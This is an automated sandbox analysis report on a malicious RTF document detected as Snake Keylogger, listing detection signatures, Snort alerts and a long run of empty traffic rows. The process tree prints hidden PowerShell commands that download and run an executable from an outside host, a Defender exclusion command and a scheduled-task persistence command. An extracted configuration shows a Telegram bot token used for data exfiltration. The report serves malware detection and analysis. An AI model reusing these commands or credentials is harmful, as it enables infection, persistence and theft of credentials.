Edit tour
Windows
Analysis Report
Revised sales contract for Crosswear.rtf
Overview
General Information
Detection
Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Microsoft Office creates scripting files
Tries to steal Mail credentials (via file / registry access)
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Yara detected Generic Downloader
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w7x64
- WINWORD.EXE (PID: 2728 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - powershell.exe (PID: 2016 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoP -sta -NonI -W H idden -Exe cutionPoli cy bypass -NoLogo -c ommand "(N ew-Object System.Net .WebClient ).Download File('httP ://f070596 4.xsph.ru/ mum.exe',' C:\Users\u ser\AppDat a\Roaming\ mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F) - cmd.exe (PID: 2348 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\User s\user\App Data\Roami ng\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - mum.exe (PID: 1724 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - powershell.exe (PID: 1808 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" A dd-MpPrefe rence -Exc lusionPath "C:\Users \user\AppD ata\Roamin g\RRUwFfPT EDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA) - schtasks.exe (PID: 1916 cmdline:
C:\Windows \System32\ schtasks.e xe" /Creat e /TN "Upd ates\RRUwF fPTEDHYrl" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmpEFF.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - mum.exe (PID: 2588 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - powershell.exe (PID: 2572 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoP -sta -NonI -W H idden -Exe cutionPoli cy bypass -NoLogo -c ommand "(N ew-Object System.Net .WebClient ).Download File('httP ://f070596 4.xsph.ru/ mum.exe',' C:\Users\u ser\AppDat a\Roaming\ mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F) - cmd.exe (PID: 1672 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\User s\user\App Data\Roami ng\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - mum.exe (PID: 2520 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - powershell.exe (PID: 2864 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" A dd-MpPrefe rence -Exc lusionPath "C:\Users \user\AppD ata\Roamin g\RRUwFfPT EDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA) - schtasks.exe (PID: 2940 cmdline:
C:\Windows \System32\ schtasks.e xe" /Creat e /TN "Upd ates\RRUwF fPTEDHYrl" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmp430A.tm p MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - mum.exe (PID: 2024 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - mum.exe (PID: 1484 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - svchost.exe (PID: 2024 cmdline:
C:\Windows \System32\ svchost.ex e -k WerSv cGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D) - powershell.exe (PID: 684 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoP -sta -NonI -W H idden -Exe cutionPoli cy bypass -NoLogo -c ommand "(N ew-Object System.Net .WebClient ).Download File('httP ://f070596 4.xsph.ru/ mum.exe',' C:\Users\u ser\AppDat a\Roaming\ mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F) - cmd.exe (PID: 1732 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\User s\user\App Data\Roami ng\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - mum.exe (PID: 2708 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - powershell.exe (PID: 1920 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" A dd-MpPrefe rence -Exc lusionPath "C:\Users \user\AppD ata\Roamin g\RRUwFfPT EDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA) - schtasks.exe (PID: 544 cmdline:
C:\Windows \System32\ schtasks.e xe" /Creat e /TN "Upd ates\RRUwF fPTEDHYrl" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmpA5B2.tm p MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - mum.exe (PID: 828 cmdline:
C:\Users\u ser\AppDat a\Roaming\ mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02) - verclsid.exe (PID: 772 cmdline:
"C:\Window s\system32 \verclsid. exe" /S /C {06290BD2 -48AA-11D2 -8432-0060 08C3FBFC} /I {000001 12-0000-00 00-C000-00 0000000046 } /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86) - notepad.exe (PID: 2940 cmdline:
C:\Windows \system32\ NOTEPAD.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\DRd tfhgYgeghD p .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
- cleanup
{"Exfil Mode": "Telegram", "Telegram Token": "5653882710:AAFqiub7KKNl9WuwdcBa3Hc2Wwy7UHDnsWc", "Telegram ID": "1120598411"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_RTF_Exploit_Scripting | detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. | ditekSHen |
| |
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth |
| |
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth |
| |
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth |
| |
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth |
| |
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth |
| |
Click to see the 35 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
| |
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 44 entries |
⊘No Sigma rule has matched
Timestamp: | 192.168.2.22132.226.8.16949173802842536 08/23/22-13:43:14.345361 |
SID: | 2842536 |
Source Port: | 49173 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.22193.122.130.049175802842536 08/23/22-13:43:56.802113 |
SID: | 2842536 |
Source Port: | 49175 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.22193.122.130.049174802842536 08/23/22-13:43:29.255487 |
SID: | 2842536 |
Source Port: | 49174 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Code function: | 15_2_002CE440 | |
Source: | Code function: | 15_2_002CE89C | |
Source: | Code function: | 15_2_002CECF0 | |
Source: | Code function: | 15_2_002CC17F | |
Source: | Code function: | 15_2_002C3576 | |
Source: | Code function: | 15_2_002CF148 | |
Source: | Code function: | 15_2_002CF5A4 | |
Source: | Code function: | 15_2_002CF9FB | |
Source: | Code function: | 15_2_002CC5DC | |
Source: | Code function: | 15_2_002C2620 | |
Source: | Code function: | 15_2_002C3A38 | |
Source: | Code function: | 15_2_002CCA30 | |
Source: | Code function: | 15_2_002CCE88 | |
Source: | Code function: | 15_2_002C3E98 | |
Source: | Code function: | 15_2_002C2A90 | |
Source: | Code function: | 15_2_002CD2E0 | |
Source: | Code function: | 15_2_002C42F9 | |
Source: | Code function: | 15_2_002CD738 | |
Source: | Code function: | 15_2_002C4758 | |
Source: | Code function: | 15_2_002CDB90 | |
Source: | Code function: | 15_2_002CDFE8 | |
Source: | Code function: | 15_2_002C217A | |
Source: | Code function: | 15_2_002C2DD1 | |
Source: | Code function: | 15_2_002C1B48 | |
Source: | Code function: | 15_2_002C2359 | |
Source: | Code function: | 15_2_003E6838 | |
Source: | Code function: | 15_2_003E7E18 | |
Source: | Code function: | 15_2_003E1600 | |
Source: | Code function: | 15_2_003E8270 | |
Source: | Code function: | 15_2_003E1A58 | |
Source: | Code function: | 15_2_003E5258 | |
Source: | Code function: | 15_2_003E0048 | |
Source: | Code function: | 15_2_003E04A0 | |
Source: | Code function: | 15_2_003E6C90 | |
Source: | Code function: | 15_2_003E08F8 | |
Source: | Code function: | 15_2_003E56D8 | |
Source: | Code function: | 15_2_003E86C8 | |
Source: | Code function: | 15_2_003E5B30 | |
Source: | Code function: | 15_2_003E8B20 | |
Source: | Code function: | 15_2_003E7110 | |
Source: | Code function: | 15_2_003E8F78 | |
Source: | Code function: | 15_2_003E7568 | |
Source: | Code function: | 15_2_003E0D50 | |
Source: | Code function: | 15_2_003E11A8 | |
Source: | Code function: | 15_2_003E5F88 | |
Source: | Code function: | 15_2_003E63E0 | |
Source: | Code function: | 15_2_003E79C0 | |
Source: | Code function: | 15_2_003E3498 | |
Source: | Code function: | 15_2_003E3489 | |
Source: | Code function: | 15_2_003E37AE | |
Source: | Code function: | 26_2_001CE440 | |
Source: | Code function: | 26_2_001CE89A | |
Source: | Code function: | 26_2_001CECF0 | |
Source: | Code function: | 26_2_001CF148 | |
Source: | Code function: | 26_2_001CC17F | |
Source: | Code function: | 26_2_001C3576 | |
Source: | Code function: | 26_2_001CF5A2 | |
Source: | Code function: | 26_2_001CF9FA | |
Source: | Code function: | 26_2_001CC5E2 | |
Source: | Code function: | 26_2_001C3A38 | |
Source: | Code function: | 26_2_001CCA30 | |
Source: | Code function: | 26_2_001C2620 | |
Source: | Code function: | 26_2_001C3E98 | |
Source: | Code function: | 26_2_001C2A90 | |
Source: | Code function: | 26_2_001CCE88 | |
Source: | Code function: | 26_2_001C42F9 | |
Source: | Code function: | 26_2_001CD2E0 | |
Source: | Code function: | 26_2_001CD738 | |
Source: | Code function: | 26_2_001C4758 | |
Source: | Code function: | 26_2_001CDB90 | |
Source: | Code function: | 26_2_001CDFE8 | |
Source: | Code function: | 26_2_001C217A | |
Source: | Code function: | 26_2_001C2DD1 | |
Source: | Code function: | 26_2_001C2359 | |
Source: | Code function: | 26_2_001C1B48 | |
Source: | Code function: | 26_2_002E6838 | |
Source: | Code function: | 26_2_002E1600 | |
Source: | Code function: | 26_2_002E7E18 | |
Source: | Code function: | 26_2_002E8270 | |
Source: | Code function: | 26_2_002E0048 | |
Source: | Code function: | 26_2_002E1A58 | |
Source: | Code function: | 26_2_002E5258 | |
Source: | Code function: | 26_2_002E04A0 | |
Source: | Code function: | 26_2_002E6C90 | |
Source: | Code function: | 26_2_002E08F8 | |
Source: | Code function: | 26_2_002E86C8 | |
Source: | Code function: | 26_2_002E56D8 | |
Source: | Code function: | 26_2_002E8B20 | |
Source: | Code function: | 26_2_002E5B30 | |
Source: | Code function: | 26_2_002E7110 | |
Source: | Code function: | 26_2_002E7568 | |
Source: | Code function: | 26_2_002E8F78 | |
Source: | Code function: | 26_2_002E0D50 | |
Source: | Code function: | 26_2_002E11A8 | |
Source: | Code function: | 26_2_002E5F88 | |
Source: | Code function: | 26_2_002E63E0 | |
Source: | Code function: | 26_2_002E79C0 | |
Source: | Code function: | 26_2_002E3489 | |
Source: | Code function: | 26_2_002E3498 | |
Source: | Code function: | 26_2_002E37AE | |
Source: | Code function: | 34_2_0025E440 | |
Source: | Code function: | 34_2_0025E89A | |
Source: | Code function: | 34_2_0025ECF0 | |
Source: | Code function: | 34_2_00253561 | |
Source: | Code function: | 34_2_0025C17F | |
Source: | Code function: | 34_2_0025F148 | |
Source: | Code function: | 34_2_0025F5A2 | |
Source: | Code function: | 34_2_0025F9FA | |
Source: | Code function: | 34_2_0025C5DA | |
Source: | Code function: | 34_2_00252620 | |
Source: | Code function: | 34_2_0025CA30 | |
Source: | Code function: | 34_2_00253A38 | |
Source: | Code function: | 34_2_0025CE88 | |
Source: | Code function: | 34_2_00252A90 | |
Source: | Code function: | 34_2_00253E98 | |
Source: | Code function: | 34_2_0025D2E0 | |
Source: | Code function: | 34_2_002542F9 | |
Source: | Code function: | 34_2_0025D738 | |
Source: | Code function: | 34_2_00254758 | |
Source: | Code function: | 34_2_0025DB90 | |
Source: | Code function: | 34_2_0025DFE8 | |
Source: | Code function: | 34_2_0025217A | |
Source: | Code function: | 34_2_00252DD1 | |
Source: | Code function: | 34_2_00251B48 | |
Source: | Code function: | 34_2_00252359 | |
Source: | Code function: | 34_2_005F1A58 | |
Source: | Code function: | 34_2_005F5258 | |
Source: | Code function: | 34_2_005F0D50 | |
Source: | Code function: | 34_2_005F0048 | |
Source: | Code function: | 34_2_005F8F78 | |
Source: | Code function: | 34_2_005F8270 | |
Source: | Code function: | 34_2_005F7568 | |
Source: | Code function: | 34_2_005F7E18 | |
Source: | Code function: | 34_2_005F7110 | |
Source: | Code function: | 34_2_005F1600 | |
Source: | Code function: | 34_2_005F6838 | |
Source: | Code function: | 34_2_005F5B30 | |
Source: | Code function: | 34_2_005F8B20 | |
Source: | Code function: | 34_2_005F56D8 | |
Source: | Code function: | 34_2_005F86C8 | |
Source: | Code function: | 34_2_005F79C0 | |
Source: | Code function: | 34_2_005F08F8 | |
Source: | Code function: | 34_2_005F63E0 | |
Source: | Code function: | 34_2_005F6C90 | |
Source: | Code function: | 34_2_005F5F88 | |
Source: | Code function: | 34_2_005F11A8 | |
Source: | Code function: | 34_2_005F04A0 | |
Source: | Code function: | 34_2_005F3498 | |
Source: | Code function: | 34_2_005F3489 |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
